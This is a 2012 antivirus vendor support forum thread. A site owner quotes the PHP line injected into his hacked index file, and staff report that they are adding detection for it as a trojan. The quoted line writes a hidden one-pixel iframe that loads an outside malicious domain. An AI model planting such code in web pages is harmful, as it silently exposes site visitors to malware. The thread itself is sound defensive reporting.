 Index Injection Iframe Virus, index injected, not detected by bitdefender |
|
|
  |
 May 6 2012, 10:15 AM
Post
#1
|
|
|
Newbie Group: Members Posts: 4 Joined: 6-May 12 Member No.: 104,392  |
Hello,
My site was hacked, by this line added at top of the index file. <?php echo "<iframe src=\"http://sluxxqqgykewolmoli.in/in.cgi?default\" width=1 height=1 frameborder=0></iframe>"; echo ""; And Bitdefender don't detect this ! thank you to add this one all my pass was changed |
 |
 
|
|
May 6 2012, 10:20 AM
Post
#2
|
|
|
Bitdefender Support  Group: Root Admin Posts: 13,548 Joined: 27-January 08 From: BitDefender HQ Member No.: 9,374 |
Hello (IMG:style_emoticons/default/smile.gif)
Welcome to the forums! Bitdefender detects that website as infected. https://www.virustotal.com/url/88411726de37...sis/1336300527/ Let me know if you have other questions. Take care. |
|
|
|
|
May 6 2012, 10:23 AM
Post
#3
|
|
|
Newbie Group: Members Posts: 4 Joined: 6-May 12 Member No.: 104,392 |
Oh yes, it was te only one on the list that detect it.
I tought it not detect it because when I scan my index file, it said no virus, but with other url injection I got on another website, it said virus and delete the virus from the file automatically. Why the index file not detected as virus so like other url injections ? thank you |
|
|
|
|
May 6 2012, 12:34 PM
Post
#4
|
|
|
Bitdefender Support Group: Root Admin Posts: 13,548 Joined: 27-January 08 From: BitDefender HQ Member No.: 9,374 |
Hello (IMG:style_emoticons/default/smile.gif)
Could you please send me the infected index file so we can check it out? Please pack that file in archive with the password infected and upload it on http://www.sendspace.com or http://www.mediafire.com and send me a PM with the download link. We will analyze the information you sent and then reply with a possible solution in the shortest time. Have a nice day. |
|
|
|
|
May 6 2012, 12:50 PM
Post
#5
|
|
|
Newbie Group: Members Posts: 4 Joined: 6-May 12 Member No.: 104,392 |
QUOTE (Christian @ May 6 2012, 02:59 PM)  Could you please send me the infected index file so we can check it out? PM sent with zip link ty ! |
|
|
|
|
May 6 2012, 02:04 PM
Post
#6
|
|
|
Bitdefender Support Group: Root Admin Posts: 13,548 Joined: 27-January 08 From: BitDefender HQ Member No.: 9,374 |
Hello (IMG:style_emoticons/default/smile.gif)
I have sent the file to our labs, I will get back to you with a final answer. Take care. |
|
|
|
|
May 7 2012, 12:18 AM
Post
#7
|
|
|
Newbie Group: Members Posts: 1 Joined: 7-May 12 Member No.: 104,415 |
I am interested to hear about this too as i found this code on one of our websites too and have been googling for information.
Please pop an update on this thread when you have one. |
|
|
|
|
May 7 2012, 06:59 AM
Post
#8
|
|
|
Bitdefender Support Group: Root Admin Posts: 13,548 Joined: 27-January 08 From: BitDefender HQ Member No.: 9,374 |
Hello (IMG:style_emoticons/default/smile.gif)
The file has been signed as Trojan.Iframe.APT Detection will be available after our next update. File index_php declared INFECTED Thank you for the sample. |
|
|
|
|
May 7 2012, 07:32 AM
Post
#9
|
|
|
Newbie Group: Members Posts: 4 Joined: 6-May 12 Member No.: 104,392 |
Hi Christian,
Great job, now I feel better on my FTP updates :-) Thank you !! |
|
|
|
|
May 7 2012, 09:01 AM
Post
#10
|
|
|
Bitdefender Support Group: Root Admin Posts: 13,548 Joined: 27-January 08 From: BitDefender HQ Member No.: 9,374 |
Hi (IMG:style_emoticons/default/smile.gif)
Thank you for your feedback! Let us know if you need anything from us. Take care. |
|
|
|
|
1 User(s) are reading this topic (1 Guests and 0 Anonymous Users)
0 Members:
|
Lo-Fi Version | Time is now: 19th May 2013 - 05:25 AM |